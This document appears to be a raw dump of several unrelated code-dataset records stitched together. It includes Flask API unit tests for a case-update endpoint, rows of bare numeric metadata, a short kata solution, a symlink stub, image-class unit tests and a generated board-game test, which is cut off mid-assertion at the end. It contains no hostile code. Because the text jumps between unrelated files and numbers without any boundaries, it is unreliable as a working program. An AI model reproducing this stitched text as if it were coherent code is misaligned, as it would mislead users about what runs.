any database methods # self.assertFalse(mock_db_add.called) # self.assertFalse(mock_db_commit.called) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') def test_009_update_case(self, mock_db_query, mock_db_add, mock_db_commit): """Updates the details of a case.""" mock_db_query.get.side_effect = [ case1, case1.address ] response = self.app.put('/v1/cases/' + standard_dict['case_reference'], data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 200) # Check we call the correct two database methods self.assertTrue(mock_db_add.called) self.assertTrue(mock_db_commit.called) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') def test_010_update_case_invalid_case_ref(self, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.get.side_effect = [ None, case1.address ] response = self.app.put('/v1/cases/N0-1D', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 404) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('Case not found', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') def test_011_update_case_mismatch_case_ref(self, mock_db_query, mock_db_add, mock_db_commit): """The case reference in the url does not match the case reference in the request body.""" mock_db_query.get.side_effect = [ case1, case1.address ] response = self.app.put('/v1/cases/WR0NG-1D', data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 400) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('Case Reference mismatch', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_title_number') def test_010_update_case_title_number_already_exists(self, mock_case_set_title_number, mock_db_query, mock_db_add, mock_db_commit): """The given title number already exists for an active case.""" mock_db_query.get.side_effect = [ case1, case1.address ] mock_case_set_title_number.side_effect = ConflictError('An active case with this title number already exists') response = self.app.put('/v1/cases/' + standard_dict['case_reference'], data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 409) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('An active case with this title number already exists', response.json['error_message']) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_status') def test_010_update_case_invalid_status(self, mock_case_set_status, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.get.side_effect = [ case1, case1.address ] mock_case_set_status.side_effect = ValueError('Status is invalid') local_standard_dict = copy.deepcopy(standard_dict) local_standard_dict['status'] = 'invalid status here' response = self.app.put('/v1/cases/' + local_standard_dict['case_reference'], data=json.dumps(local_standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 400) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertTrue( 'Status is invalid' in response.json['error_message'] or 'is not one of' in response.json['error_message'] ) @mock.patch.object(db.session, 'commit') @mock.patch.object(db.session, 'add') @mock.patch.object(db.Model, 'query') @mock.patch.object(Case, 'set_status') def test_010_update_case_title_number_already_exists_status(self, mock_case_set_status, mock_db_query, mock_db_add, mock_db_commit): """The given case reference does not exist.""" mock_db_query.get.side_effect = [ case1, case1.address ] mock_case_set_status.side_effect = ConflictError('An active case with this title number already exists') response = self.app.put('/v1/cases/' + standard_dict['case_reference'], data=json.dumps(standard_dict), headers={'accept': 'application/json', 'content-type': 'application/json'}) print(response.get_data().decode()) self.assertEqual(response.status_code, 409) # Check we do not call the any database methods self.assertFalse(mock_db_add.called) self.assertFalse(mock_db_commit.called) self.assertIn('An active case with this title number already exists', response.json['error_message']) # @mock.patch.object(db.session, 'commit') # @mock.patch.object(db.session, 'add') # @mock.patch.object(db.Model, 'query') # def test_012_update_case_invalid_json(self, mock_db_query, mock_db_add, mock_db_commit): # """The json data used to update the case is invalid.""" # local_standard_dict = copy.deepcopy(standard_dict) # del local_standard_dict['title_number'] # response = self.app.put('/v1/cases/' + local_standard_dict['case_reference'], # data=json.dumps(local_standard_dict), # headers={'accept': 'application/json', 'content-type': 'application/json'}) # self.assertEqual(response.status_code, 400) # self.assertIn('"error_message":"\'case_reference\' is a required property', response.json['error_message']) # # check we haven't tried calling the postgres database # self.assertFalse(mock_db_query.called) # # Check we do not call the any database methods # self.assertFalse(mock_db_add.called) # self.assertFalse(mock_db_commit.called)
44.741379
118
0.623603
2,453
20,760
5.059111
0.091724
0.041579
0.059226
0.058904
0.861322
0.856648
0.847381
0.842546
0.824738
0.797019
0
0.021917
0.257129
20,760
463
119
44.838013
0.782778
0.156647
0
0.647436
0
0
0.173422
0.019116
0
0
0
0
0.169872
1
0.057692
false
0
0.022436
0
0.083333
0.054487
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8fd2e82aebac5ad690a708e50d0e59e898bbc4d9
148
py
Python
6 kyu/How Much.py
mwk0408/codewars_solutions
9b4f502b5f159e68024d494e19a96a226acad5e5
[ "MIT" ]
6
2020-09-03T09:32:25.000Z
2020-12-07T04:10:01.000Z
6 kyu/How Much.py
mwk0408/codewars_solutions
9b4f502b5f159e68024d494e19a96a226acad5e5
[ "MIT" ]
1
2021-12-13T15:30:21.000Z
2021-12-13T15:30:21.000Z
6 kyu/How Much.py
mwk0408/codewars_solutions
9b4f502b5f159e68024d494e19a96a226acad5e5
[ "MIT" ]
null
null
null
def howmuch(m, n): return [[f"M: {i}",f"B: {5+i//63*9}" ,f"C: {4+i//63*7}" ] for i in range(min(m,n), max(m, n)+1) if ( i>=37 and (i-37)%63==0)]
74
129
0.47973
39
148
1.820513
0.615385
0.084507
0
0
0
0
0
0
0
0
0
0.129032
0.162162
148
2
129
74
0.443548
0
0
0
0
0
0.228188
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
8fea4bed48fa59ec55fe07f8f6ad1b99d153bbb8
96
py
Python
venv/lib/python3.8/site-packages/cleo/parser.py
Retraces/UkraineBot
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
[ "MIT" ]
2
2022-03-13T01:58:52.000Z
2022-03-31T06:07:54.000Z
venv/lib/python3.8/site-packages/cleo/parser.py
DesmoSearch/Desmobot
b70b45df3485351f471080deb5c785c4bc5c4beb
[ "MIT" ]
19
2021-11-20T04:09:18.000Z
2022-03-23T15:05:55.000Z
venv/lib/python3.8/site-packages/cleo/parser.py
DesmoSearch/Desmobot
b70b45df3485351f471080deb5c785c4bc5c4beb
[ "MIT" ]
null
null
null
/home/runner/.cache/pip/pool/7b/7f/96/63a574971b9bef03664f7734b5fe4d077878ca6eb0d0b03b788da826f9
96
96
0.895833
9
96
9.555556
1
0
0
0
0
0
0
0
0
0
0
0.4375
0
96
1
96
96
0.458333
0
0
0
0
0
0
0
0
1
0
0
0
0
null
null
0
0
null
null
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
1
0
0
0
1
0
0
0
0
0
0
0
0
6
890af031eb6be83b77fc37f7c9187ae08b527b00
340
py
Python
backend/application/schemas/__init__.py
uesleicarvalhoo/Ecommerce
1d8d0f0c522dcd27fd90e315989b6fa93caf62b8
[ "MIT" ]
null
null
null
backend/application/schemas/__init__.py
uesleicarvalhoo/Ecommerce
1d8d0f0c522dcd27fd90e315989b6fa93caf62b8
[ "MIT" ]
null
null
null
backend/application/schemas/__init__.py
uesleicarvalhoo/Ecommerce
1d8d0f0c522dcd27fd90e315989b6fa93caf62b8
[ "MIT" ]
null
null
null
from backend.domain.schemas import Token, TokenData from .crud import NewClientSchema, NewOrderItemSchema, NewProductSchema, UpdateClientSchema from .entities import ClientSchema, OrderItemSchema, OrderSchema, PaymentInfoSchema, PaymentResultSchema, ProductSchema from .query import QueryClientSchema, QueryOrderSchema, QueryProductSchema
56.666667
119
0.870588
29
340
10.206897
0.793103
0
0
0
0
0
0
0
0
0
0
0
0.082353
340
5
120
68
0.948718
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
891141474009e5e3bb5335af572453341185f7e8
94
py
Python
code/misc/__init__.py
niuwk/infonets
274e97c9a86144dd52cbe90caffff578a2f5d178
[ "BSD-3-Clause" ]
8
2018-06-20T23:20:43.000Z
2020-01-12T01:32:06.000Z
code/misc/__init__.py
niuwk/infonets
274e97c9a86144dd52cbe90caffff578a2f5d178
[ "BSD-3-Clause" ]
null
null
null
code/misc/__init__.py
niuwk/infonets
274e97c9a86144dd52cbe90caffff578a2f5d178
[ "BSD-3-Clause" ]
4
2018-06-26T20:28:13.000Z
2021-06-17T13:39:56.000Z
from __future__ import absolute_import, division, print_function from .predataset import *
15.666667
64
0.819149
11
94
6.454545
0.727273
0
0
0
0
0
0
0
0
0
0
0
0.138298
94
5
65
18.8
0.876543
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0.5
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
1
0
6
8f1621ab1057ac7a0d606f8f58c524319c41c036
1,067
py
Python
pyenv/lib/python3.6/weakref.py
ronald-rgr/ai-chatbot-smartguide
c9c830feb6b66c2e362f8fb5d147ef0c4f4a08cf
[ "Apache-2.0" ]
null
null
null
pyenv/lib/python3.6/weakref.py
ronald-rgr/ai-chatbot-smartguide
c9c830feb6b66c2e362f8fb5d147ef0c4f4a08cf
[ "Apache-2.0" ]
3
2020-03-23T18:01:51.000Z
2021-03-19T23:15:15.000Z
pyenv/lib/python3.6/weakref.py
ronald-rgr/ai-chatbot-smartguide
c9c830feb6b66c2e362f8fb5d147ef0c4f4a08cf
[ "Apache-2.0" ]
null
null
null
XSym 0074 be01ab2100c1c1d1fb2b73cffbbd8141 /Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/weakref.py
213.4
949
0.095595
15
1,067
6.8
0.933333
0
0
0
0
0
0
0
0
0
0
0.210526
0.893158
1,067
5
949
213.4
0.684211
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
1
0
1
0
1
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
6
8f444eb6a59441c478006a9a76544b297c438d0a
16,740
py
Python
tests/test_image.py
shivamvats/autolab_core
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
[ "Apache-2.0" ]
68
2017-07-02T22:14:47.000Z
2022-03-30T19:09:37.000Z
tests/test_image.py
shivamvats/autolab_core
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
[ "Apache-2.0" ]
14
2017-06-29T18:27:12.000Z
2022-02-02T20:59:02.000Z
tests/test_image.py
shivamvats/autolab_core
cda081d2e07e3fe6cc9f3e8c86eea92330910d20
[ "Apache-2.0" ]
35
2017-07-17T01:44:59.000Z
2022-03-30T19:09:28.000Z
""" Tests the image class. Author: Jeff Mahler """ import os import logging import numpy as np import unittest from .constants import IM_HEIGHT, IM_WIDTH, BINARY_THRESH, COLOR_IM_FILEROOT from autolab_core import ( ColorImage, DepthImage, BinaryImage, SegmentationImage, GrayscaleImage, PointCloudImage, NormalCloudImage, ) class TestImage(unittest.TestCase): def test_color_init(self): # valid data random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im = ColorImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 3) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.uint8) caught_bad_channels = False try: im = ColorImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.float32) caught_bad_dtype = False try: im = ColorImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_depth_init(self): # valid data random_valid_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype( np.float32 ) im = DepthImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 1) self.assertEqual(im.type, np.float32) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.float32) caught_bad_channels = False try: im = DepthImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.uint8) caught_bad_dtype = False try: im = DepthImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_binary_init(self): # valid data random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH) ).astype(np.uint8) binary_data = 255 * (random_valid_data > BINARY_THRESH) im = BinaryImage(random_valid_data, threshold=BINARY_THRESH) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 1) self.assertTrue(np.allclose(im.data, binary_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.uint8) caught_bad_channels = False try: im = BinaryImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_dtype = False try: im = BinaryImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_grayscale_init(self): # valid data random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH) ).astype(np.uint8) im = GrayscaleImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 1) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 5).astype(np.uint8) caught_bad_channels = False try: im = GrayscaleImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_dtype = False try: im = GrayscaleImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_segment_init(self): # valid data random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH) ).astype(np.uint8) im = SegmentationImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 1) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.uint8) caught_bad_channels = False try: im = SegmentationImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_dtype = False try: im = SegmentationImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_pc_init(self): # valid data random_valid_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype( np.float32 ) im = PointCloudImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 3) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_channels = False try: im = PointCloudImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.uint8) caught_bad_dtype = False try: im = PointCloudImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) def test_nc_init(self): # valid data random_valid_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype( np.float32 ) random_valid_data = random_valid_data / np.tile( np.linalg.norm(random_valid_data, axis=2)[:, :, np.newaxis], [1, 1, 3], ) im = NormalCloudImage(random_valid_data) self.assertEqual(im.height, IM_HEIGHT) self.assertEqual(im.width, IM_WIDTH) self.assertEqual(im.channels, 3) self.assertTrue(np.allclose(im.data, random_valid_data)) # invalid channels random_data = np.random.rand(IM_HEIGHT, IM_WIDTH).astype(np.float32) caught_bad_channels = False try: im = NormalCloudImage(random_data) except ValueError: caught_bad_channels = True self.assertTrue(caught_bad_channels) # invalid type random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.uint8) caught_bad_dtype = False try: im = NormalCloudImage(random_data) except ValueError: caught_bad_dtype = True self.assertTrue(caught_bad_dtype) # invalid norm random_data = np.random.rand(IM_HEIGHT, IM_WIDTH, 3).astype(np.float32) caught_bad_norm = False try: im = NormalCloudImage(random_data) except ValueError: caught_bad_norm = True self.assertTrue(caught_bad_norm) def test_resize(self): random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im = ColorImage(random_valid_data) big_scale = 2.0 big_im = im.resize(big_scale) self.assertEqual(big_im.height, big_scale * IM_HEIGHT) self.assertEqual(big_im.width, big_scale * IM_WIDTH) small_scale = 0.5 small_im = im.resize(small_scale) self.assertEqual(small_im.height, small_scale * IM_HEIGHT) self.assertEqual(small_im.width, small_scale * IM_WIDTH) def test_transform(self): random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im = ColorImage(random_valid_data) translation = np.array([2, 2]) im_tf = im.transform(translation, 0.0) self.assertTrue(np.allclose(im[0, 0], im_tf[2, 2])) def test_shape_comp(self): random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im1 = ColorImage(random_valid_data) random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im2 = ColorImage(random_valid_data) self.assertTrue(im1.is_same_shape(im2)) random_valid_data = ( 255.0 * np.random.rand(2 * IM_HEIGHT, 2 * IM_WIDTH, 3) ).astype(np.uint8) im3 = ColorImage(random_valid_data) self.assertFalse(im1.is_same_shape(im3)) def test_mask_by_ind(self): random_valid_data = ( 255.0 * np.random.rand(IM_HEIGHT, IM_WIDTH, 3) ).astype(np.uint8) im = ColorImage(random_valid_data) ind = np.array([[0, 0]]) im2 = im.mask_by_ind(ind) self.assertEqual(np.sum(im2[1, 1]), 0.0) def test_indexing(self, height=50, width=100): color_data = (255 * np.random.rand(height, width, 3)).astype(np.uint8) im = ColorImage(color_data, "a") # test valid indexing on color images i = int(height * np.random.rand()) j = int(width * np.random.rand()) k = int(3 * np.random.rand()) logging.info("Indexing with i=%d, j=%d, k=%d" % (i, j, k)) c_true = color_data[i, j, k] c_read = im[i, j, k] self.assertTrue( np.sum(np.abs(c_true - c_read)) < 1e-5, msg="Image ijk indexing failed", ) c_true = color_data[i, j, :] c_read = im[i, j] self.assertTrue( np.sum(np.abs(c_true - c_read)) < 1e-5, msg="Image ij indexing failed", ) c_true = color_data[i, :, :] c_read = im[i] self.assertTrue( np.sum(np.abs(c_true - c_read)) < 1e-5, msg="Image i indexing failed", ) # test valid slicing on color images i_start = 0 j_start = 0 k_start = 0 i_stop = int(height * np.random.rand()) j_stop = int(width * np.random.rand()) k_stop = int(3 * np.random.rand()) i_step = 1 j_step = 1 k_step = 1 logging.info( "Slicing with i_start=%d, i_stop=%d, i_step=%d, \ j_start=%d, j_stop=%d, j_step=%d, \ k_start=%d, k_stop=%d, k_step=%d" % ( i_start, i_stop, i_step, j_start, j_stop, j_step, k_start, k_stop, k_step, ) ) c_true = color_data[ i_start:i_stop:i_step, j_start:j_stop:j_step, k_start:k_stop:k_step ] c_read = im[ i_start:i_stop:i_step, j_start:j_stop:j_step, k_start:k_stop:k_step ] self.assertTrue( np.sum(np.abs(c_true - c_read)) < 1e-5, msg="Image ijk slicing failed", ) # test out of bounds indexing on color image caught_out_of_bounds = False try: c_read = im[-1, j, k] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[i, -1, k] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[i, j, -1] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[height, j, k] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[i, width, k] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[i, j, 3] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) # test out of bounds slicing on color image. (Python slicing does not # cause out of bound) caught_out_of_bounds = False try: c_read = im[ -1:i_stop:i_step, j_start:j_stop:j_step, k_start:k_stop:k_step ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start:i_stop:i_step, -1:j_stop:j_step, k_start:k_stop:k_step ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start:i_stop:i_step, j_start:j_stop:j_step, -1:k_stop:k_step ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start : height + 1 : i_step, j_start:j_stop:j_step, k_start:k_stop:k_step, ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start:i_stop:i_step, j_start : width + 1 : j_step, k_start:k_stop:k_step, ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) caught_out_of_bounds = False try: c_read = im[ i_start:i_stop:i_step, j_start:j_stop:j_step, k_start:4:k_step ] except ValueError: caught_out_of_bounds = True self.assertTrue(caught_out_of_bounds) def test_io(self, height=50, width=100): color_data = (255 * np.random.rand(height, width, 3)).astype(np.uint8) im = ColorImage(color_data, "a") file_root = COLOR_IM_FILEROOT if not os.path.exists(os.path.dirname(file_root)): os.makedirs(os.path.dirname(file_root)) # save and load png filename = file_root + ".png" im.save(filename) loaded_im = ColorImage.open(filename) self.assertTrue( np.sum(np.abs(loaded_im.data - im.data)) < 1e-5, msg="ColorImage data changed after load png", ) os.remove(filename) # save and load jpg filename = file_root + ".jpg" im.save(filename) loaded_im = ColorImage.open(filename) os.remove(filename) # save and load npy filename = file_root + ".npy" im.save(filename) loaded_im = ColorImage.open(filename) self.assertTrue( np.sum(np.abs(loaded_im.data - im.data)) < 1e-5, msg="ColorImage data changed after load npy", ) os.remove(filename) # save and load npz filename = file_root + ".npz" im.save(filename) loaded_im = ColorImage.open(filename) self.assertTrue( np.sum(np.abs(loaded_im.data - im.data)) < 1e-5, msg="ColorImage data changed after load npz", ) os.remove(filename) os.rmdir(os.path.dirname(file_root)) if __name__ == "__main__": unittest.main()
32.695313
79
0.590562
2,132
16,740
4.363508
0.072233
0.041277
0.044932
0.065785
0.820703
0.789208
0.763087
0.756853
0.748791
0.742771
0
0.016882
0.317085
16,740
511
80
32.759296
0.796886
0.036858
0
0.638756
0
0
0.016537
0
0
0
0
0
0.169856
1
0.0311
false
0
0.014354
0
0.047847
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8f55d899ff508eb8a1d177c797a6fd9fbcf92c39
91
py
Python
bempy/django/blocks/href/__init__.py
svetlyak40wt/bempy
ad87982d17c2d14c344d9e3d91a48c37dfb72535
[ "BSD-3-Clause" ]
1
2015-04-29T15:19:45.000Z
2015-04-29T15:19:45.000Z
bempy/django/blocks/href/__init__.py
svetlyak40wt/bempy
ad87982d17c2d14c344d9e3d91a48c37dfb72535
[ "BSD-3-Clause" ]
null
null
null
bempy/django/blocks/href/__init__.py
svetlyak40wt/bempy
ad87982d17c2d14c344d9e3d91a48c37dfb72535
[ "BSD-3-Clause" ]
1
2019-06-10T16:08:54.000Z
2019-06-10T16:08:54.000Z
from bempy import block @block() def href(text, url): return dict(text=text, url=url)
15.166667
35
0.692308
15
91
4.2
0.666667
0.222222
0
0
0
0
0
0
0
0
0
0
0.175824
91
5
36
18.2
0.84
0
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0
0.25
0.25
0.75
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
56de048f5c2b7053194f6036eac5cfdc158231ae
119
py
Python
blaze/expr/scalar/__init__.py
chdoig/blaze
caa5a497e1ca1ceb1cf585483312ff4cd74d0bda
[ "BSD-3-Clause" ]
1
2015-01-18T23:59:57.000Z
2015-01-18T23:59:57.000Z
blaze/expr/scalar/__init__.py
chdoig/blaze
caa5a497e1ca1ceb1cf585483312ff4cd74d0bda
[ "BSD-3-Clause" ]
null
null
null
blaze/expr/scalar/__init__.py
chdoig/blaze
caa5a497e1ca1ceb1cf585483312ff4cd74d0bda
[ "BSD-3-Clause" ]
null
null
null
from .core import * from .numbers import * from .boolean import * from .interface import * from .parser import exprify
19.833333
27
0.756303
16
119
5.625
0.5
0.444444
0
0
0
0
0
0
0
0
0
0
0.168067
119
5
28
23.8
0.909091
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7103ed3a8dc345aca78dea3c696fddc42f31afa8
4,939
py
Python
z2/part2/interactive/jm/random_fuzzy_arrows_1/946790979.py
kozakusek/ipp-2020-testy
09aa008fa53d159672cc7cbf969a6b237e15a7b8
[ "MIT" ]
1
2020-04-16T12:13:47.000Z
2020-04-16T12:13:47.000Z
z2/part2/interactive/jm/random_fuzzy_arrows_1/946790979.py
kozakusek/ipp-2020-testy
09aa008fa53d159672cc7cbf969a6b237e15a7b8
[ "MIT" ]
18
2020-03-06T17:50:15.000Z
2020-05-19T14:58:30.000Z
z2/part2/interactive/jm/random_fuzzy_arrows_1/946790979.py
kozakusek/ipp-2020-testy
09aa008fa53d159672cc7cbf969a6b237e15a7b8
[ "MIT" ]
18
2020-03-06T17:45:13.000Z
2020-06-09T19:18:31.000Z
from part1 import ( gamma_board, gamma_busy_fields, gamma_delete, gamma_free_fields, gamma_golden_move, gamma_golden_possible, gamma_move, gamma_new, ) """ scenario: test_random_actions uuid: 946790979 """ """ random actions, total chaos """ board = gamma_new(5, 7, 6, 4) assert board is not None assert gamma_move(board, 1, 3, 2) == 1 assert gamma_move(board, 1, 1, 5) == 1 assert gamma_move(board, 2, 0, 2) == 1 assert gamma_move(board, 2, 3, 3) == 1 assert gamma_move(board, 3, 6, 0) == 0 assert gamma_move(board, 4, 2, 2) == 1 assert gamma_move(board, 4, 3, 6) == 1 assert gamma_golden_possible(board, 4) == 1 assert gamma_move(board, 5, 3, 1) == 1 assert gamma_golden_possible(board, 5) == 1 assert gamma_move(board, 6, 0, 6) == 1 assert gamma_move(board, 1, 4, 3) == 1 assert gamma_move(board, 1, 0, 6) == 0 assert gamma_move(board, 2, 1, 4) == 1 assert gamma_move(board, 2, 0, 2) == 0 assert gamma_move(board, 3, 2, 4) == 1 assert gamma_free_fields(board, 3) == 24 assert gamma_move(board, 4, 2, 6) == 1 assert gamma_move(board, 4, 0, 5) == 1 assert gamma_free_fields(board, 4) == 22 assert gamma_move(board, 5, 0, 0) == 1 assert gamma_move(board, 5, 1, 5) == 0 assert gamma_move(board, 6, 4, 4) == 1 assert gamma_move(board, 6, 1, 0) == 1 assert gamma_free_fields(board, 6) == 19 assert gamma_move(board, 1, 6, 4) == 0 assert gamma_move(board, 1, 1, 6) == 1 assert gamma_golden_possible(board, 1) == 1 assert gamma_move(board, 2, 6, 4) == 0 assert gamma_move(board, 2, 3, 2) == 0 assert gamma_move(board, 3, 5, 2) == 0 assert gamma_move(board, 4, 1, 4) == 0 assert gamma_move(board, 4, 3, 0) == 1 assert gamma_busy_fields(board, 4) == 5 assert gamma_move(board, 5, 5, 2) == 0 assert gamma_move(board, 6, 4, 0) == 1 assert gamma_move(board, 6, 2, 4) == 0 assert gamma_move(board, 1, 1, 2) == 1 assert gamma_move(board, 1, 4, 3) == 0 assert gamma_move(board, 2, 5, 2) == 0 assert gamma_free_fields(board, 2) == 15 assert gamma_move(board, 5, 4, 0) == 0 assert gamma_busy_fields(board, 5) == 2 assert gamma_move(board, 6, 4, 0) == 0 assert gamma_move(board, 6, 4, 5) == 1 assert gamma_move(board, 2, 3, 3) == 0 assert 